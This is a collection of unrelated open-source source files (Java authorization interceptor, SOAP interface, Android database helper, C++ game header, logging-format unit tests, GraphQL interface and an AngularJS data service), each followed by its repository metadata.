* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.jsecurity.authz.aop;
import org.jsecurity.aop.AnnotationMethodInterceptor;
import org.jsecurity.aop.MethodInvocation;
import org.jsecurity.authz.AuthorizationException;
import java.lang.annotation.Annotation;
/**
* An <tt>AnnotationMethodInterceptor</tt> that asserts the calling code is authorized to execute the method
* before allowing the invocation to continue.
*
* @author Les Hazlewood
* @since 0.1
*/
public abstract class AuthorizingAnnotationMethodInterceptor extends AnnotationMethodInterceptor {
public AuthorizingAnnotationMethodInterceptor(Class<? extends Annotation> annotationClass) {
super(annotationClass);
}
public Object invoke(MethodInvocation methodInvocation) throws Throwable {
assertAuthorized(methodInvocation);
return methodInvocation.proceed();
}
public abstract void assertAuthorized(MethodInvocation mi) throws AuthorizationException;
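    // Concrete subclasses (e.g. role- or permission-checking interceptors)
    // implement assertAuthorized to inspect the annotation on the invoked
    // method and throw an AuthorizationException when the caller is not
    // permitted to proceed.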
}
| apache/jsecurity | src/org/jsecurity/authz/aop/AuthorizingAnnotationMethodInterceptor.java | Java | apache-2.0 | 1,745 |
/*
* Licensed to The Apereo Foundation under one or more contributor license
* agreements. See the NOTICE file distributed with this work for additional
* information regarding copyright ownership.
*
* The Apereo Foundation licenses this file to you under the Apache License,
* Version 2.0, (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.tle.web.workflow.soap;
public interface TaskListSoapInterface {
String getTaskFilterCounts(boolean ignoreZero);
String[] getTaskFilterNames();
String getTaskList(String filterName, int start, int numResults) throws Exception;
}
| equella/Equella | Source/Plugins/Core/com.equella.core/src/com/tle/web/workflow/soap/TaskListSoapInterface.java | Java | apache-2.0 | 1,054 |
package com.soulkey.calltalent.db;
import android.content.Context;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import com.soulkey.calltalent.db.model.SettingModel;
import com.soulkey.calltalent.db.populator.SettingPopulator;
public final class DbOpenHelper extends SQLiteOpenHelper {
public static final String DB_NAME = "calltalent.db";
private static final int DB_VERSION = 1;
private static DbOpenHelper instance;
public static DbOpenHelper getInstance(Context context) {
if (null == instance) {
instance = new DbOpenHelper(context);
}
return instance;
}
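    // Illustrative usage (an assumed call site, not part of the original file):
    //   SQLiteDatabase db = DbOpenHelper.getInstance(context).getReadableDatabase();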
private DbOpenHelper(Context context) {
super(context, DB_NAME, null, DB_VERSION);
}
@Override
public void onCreate(SQLiteDatabase db) {
db.execSQL(SettingModel.CREATE_TABLE);
populateDb(db);
}
@Override
public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {
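        // No-op: DB_VERSION is still 1, so there are no migrations to run yet.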
}
private void populateDb(SQLiteDatabase db) {
SettingPopulator.populate(db);
}
}
| wpcfan/calltalent | app/src/main/java/com/soulkey/calltalent/db/DbOpenHelper.java | Java | apache-2.0 | 1,109 |
////////////////////////////////////////////////////////////////////////////
// Module : alife_human_object_handler.h
// Created : 07.10.2005
// Modified : 07.10.2005
// Author : Dmitriy Iassenev
// Description : ALife human object handler class
////////////////////////////////////////////////////////////////////////////
#pragma once
#include "alife_space.h"
class CSE_ALifeItemWeapon;
class CSE_ALifeInventoryItem;
class CSE_ALifeGroupAbstract;
class CSE_ALifeHumanAbstract;
class CALifeHumanObjectHandler {
public:
typedef CSE_ALifeHumanAbstract object_type;
private:
object_type* m_object;
public:
IC CALifeHumanObjectHandler(object_type* object);
IC object_type& object() const;
public:
u16 get_available_ammo_count(const CSE_ALifeItemWeapon* weapon, ALife::OBJECT_VECTOR& objects);
u16 get_available_ammo_count(const CSE_ALifeItemWeapon* weapon, ALife::ITEM_P_VECTOR& items,
ALife::OBJECT_VECTOR* objects = 0);
void attach_available_ammo(CSE_ALifeItemWeapon* weapon, ALife::ITEM_P_VECTOR& items,
ALife::OBJECT_VECTOR* objects = 0);
bool can_take_item(CSE_ALifeInventoryItem* inventory_item);
void collect_ammo_boxes();
public:
void detach_all(bool fictitious);
void update_weapon_ammo();
void process_items();
CSE_ALifeDynamicObject* best_detector();
CSE_ALifeItemWeapon* best_weapon();
public:
int choose_equipment(ALife::OBJECT_VECTOR* objects = 0);
int choose_weapon(const ALife::EWeaponPriorityType& weapon_priority_type,
ALife::OBJECT_VECTOR* objects = 0);
int choose_food(ALife::OBJECT_VECTOR* objects = 0);
int choose_medikit(ALife::OBJECT_VECTOR* objects = 0);
int choose_detector(ALife::OBJECT_VECTOR* objects = 0);
int choose_valuables();
bool choose_fast();
void choose_group(CSE_ALifeGroupAbstract* group_abstract);
void attach_items();
};
#include "alife_human_object_handler_inline.h" | Im-dex/xray-162 | code/engine/xrGame/alife_human_object_handler.h | C | apache-2.0 | 1,999 |
package com.splinter.graphing;
import org.junit.Assert;
import org.junit.Test;
import java.util.HashMap;
import java.util.Map;
public class SplinterLogTest {
@Test
public void testDisableLogs() {
try {
SLog.setEnabled(false);
String expected = "";
Assert.assertEquals(expected, new SLogStop("Coffee Time", "coffeeComplete")
.withOperationAlias("ensureCapacity")
.withComponentOverride("WaterReservoir")
.withUserData("size", "large")
.withInstrumentationOverride(0, null)
.toString());
} finally {
SLog.setEnabled(true);
}
}
@Test
public void testStaticUtilsVarArgs() {
String expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", null));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;_MISSING_KEY_0=null;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", null, null));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", "size"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=null;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", "size", null));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;_MISSING_KEY_0=large;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", null, "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;_MISSING_KEY_0=large;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", null, "large", "newkey"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=large;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", "size", "large"));
}
@Test
public void testStaticUtils() {
String expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=large;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize", "size", "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;";
Assert.assertEquals(expected, SLogCall.log("Coffee Time", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=A;size=large;";
Assert.assertEquals(expected, SLogStart.log("Coffee Time", "selectCupSize", "size", "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=A;";
Assert.assertEquals(expected, SLogStart.log("Coffee Time", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=F;size=large;";
Assert.assertEquals(expected, SLogStop.log("Coffee Time", "selectCupSize", "size", "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=F;";
Assert.assertEquals(expected, SLogStop.log("Coffee Time", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;+MC=1;size=large;";
Assert.assertEquals(expected, SLogBroadcastSend.log("Coffee Time", "selectCupSize", "size", "large"));
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;+MC=1;";
Assert.assertEquals(expected, SLogBroadcastSend.log("Coffee Time", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=bcastId;+M=A;+OA=selectCupSize;size=large;";
Assert.assertEquals(expected, SLogBroadcastStart.log("Coffee Time", "bcastId", "selectCupSize","size", "large"));
expected = "$SPG$+T=Coffee Time;+O=bcastId;+M=A;+OA=selectCupSize;";
Assert.assertEquals(expected, SLogBroadcastStart.log("Coffee Time", "bcastId", "selectCupSize"));
expected = "$SPG$+T=Coffee Time;+O=bcastId;+M=F;+OA=selectCupSize;size=large;";
Assert.assertEquals(expected, SLogBroadcastStop.log("Coffee Time", "bcastId", "selectCupSize","size", "large"));
expected = "$SPG$+T=Coffee Time;+O=bcastId;+M=F;+OA=selectCupSize;";
Assert.assertEquals(expected, SLogBroadcastStop.log("Coffee Time", "bcastId", "selectCupSize"));
}
@Test
public void testSunnyDay() {
String expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=large;";
Assert.assertEquals(expected, new SLogCall("Coffee Time", "selectCupSize")
.withUserData("size", "large").toString());
Map<String, String> userData = new HashMap<String, String>();
userData.put("size", "large");
Assert.assertEquals(expected, new SLogCall("Coffee Time", "selectCupSize")
.withUserData(userData).toString());
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;size=large;size1=large;size2=large;size3=large;size4=large;size5=large;";
Assert.assertEquals(expected, new SLogCall("Coffee Time", "selectCupSize")
.withUserData("size", "large")
.withUserData("size1", "large")
.withUserData("size2", "large")
.withUserData("size3", "large")
.withUserData("size4", "large")
.withUserData("size5", "large").toString());
}
@Test
public void testOptionalParams() {
String expected = "$SPG$+T=Coffee Time;+O=pumpWater;+M=A;+I^=100ms;";
Assert.assertEquals(expected, new SLogStart("Coffee Time", "pumpWater")
.withInstrumentationOverride(100, SLog.TimeNotation.MILLIS)
.toString());
expected = "$SPG$+T=Coffee Time;+O=coffeeComplete;+M=F;+OA=ensureCapacity;+C^=WaterReservoir;";
Assert.assertEquals(expected, new SLogStop("Coffee Time", "coffeeComplete")
.withOperationAlias("ensureCapacity")
.withComponentOverride("WaterReservoir")
.toString());
}
@Test
public void testMissingParams() {
String expected = "$SPG$+T=_MISSING_TASK_;+O=_MISSING_OPERATION_;+M=S;";
Assert.assertEquals(expected, new SLog(null, null, null)
.toString());
expected = "$SPG$+T=Coffee Time;+O=selectCupSize;+M=S;_MISSING_KEY_0=large;";
Assert.assertEquals(expected, new SLogCall("Coffee Time", "selectCupSize")
.withUserData(null, "large").toString());
}
@Test
public void testEscaping() {
Assert.assertEquals("abcd", SLog.escape("abcd"));
Assert.assertEquals("ab\\ncd", SLog.escape("ab\ncd"));
Assert.assertNull(SLog.escape(null));
Assert.assertEquals("", SLog.escape(""));
Assert.assertEquals("ab\\=cd", SLog.escape("ab=cd"));
Assert.assertEquals("ab\\;cd", SLog.escape("ab;cd"));
Assert.assertEquals("ab\\\\cd", SLog.escape("ab\\cd"));
}
@Test
public void testEscapingLog() {
String expected = "$SPG$+T=file\\; opened;+O=\\\\open;+M=S;+OA=\\=1;r\\=sr=/Users/dimitarz/\\;filename.log;";
Assert.assertEquals(expected, new SLog(null, null, null)
.withUserData("r=sr", "/Users/dimitarz/;filename.log")
.withOperation("\\open")
.withOperationAlias("=1")
.withTask("file; opened")
.toString());
}
}
| dimitarz/splinter | src/test/java/com/splinter/graphing/SplinterLogTest.java | Java | apache-2.0 | 7,294 |
package io.zrz.graphql.core.decl;
import java.util.List;
import org.eclipse.jdt.annotation.Nullable;
import io.zrz.graphql.core.doc.GQLDirective;
import io.zrz.graphql.core.parser.GQLSourceLocation;
public interface GQLDeclaration {
@Nullable
String description();
<R> R apply(GQLDeclarationVisitor<R> visitor);
List<GQLDirective> directives();
@Nullable
GQLSourceLocation location();
GQLDeclaration withDescription(String value);
GQLDeclaration withDirectives(GQLDirective... elements);
GQLDeclaration withDirectives(Iterable<? extends GQLDirective> elements);
GQLDeclaration withLocation(GQLSourceLocation value);
}
| zourzouvillys/graphql | graphql-core/src/main/java/io/zrz/graphql/core/decl/GQLDeclaration.java | Java | apache-2.0 | 651 |
/*
* @class TableExamplesService
*/
export default class TableExamplesService {
constructor($http) {
this.$http = $http;
}
static getClassName() { return 'TableExamplesService'; }
getClassName() { return TableExamplesService.getClassName(); }
/*
* @func getColumns
   * @desc gets a list of columns representing the dataset that
* allows data tables to map the array of data to the table
*/
getColumns() {
return this.$http.get('http://localhost:3001/api/DataTable/Columns/People');
}
/*
* @func addColumn
* @desc adds a col
* allows data tables to map the array of data to the table
*/
addColumn(item) {
return this.$http.post('http://localhost:3001/api/DataTable/Columns/People', item);
}
/*
* @func getData
* @desc gets a list of items from the api
*/
getData() {
return this.$http.get('http://localhost:3001/api/People');
}
/*
* @func addData
* @desc adds an item to the api
* @param item
*/
addData(item) {
return this.$http.post('http://localhost:3001/api/People', item);
  }
}
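// Illustrative wiring (assumed module name, not part of the original file):
//   TableExamplesService.$inject = ['$http'];
//   angular.module('app').service('TableExamplesService', TableExamplesService);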
} | garrettwong/GDashboard | client/app/components/tableExamples/tableExamples.service.js | JavaScript | apache-2.0 | 1,084 |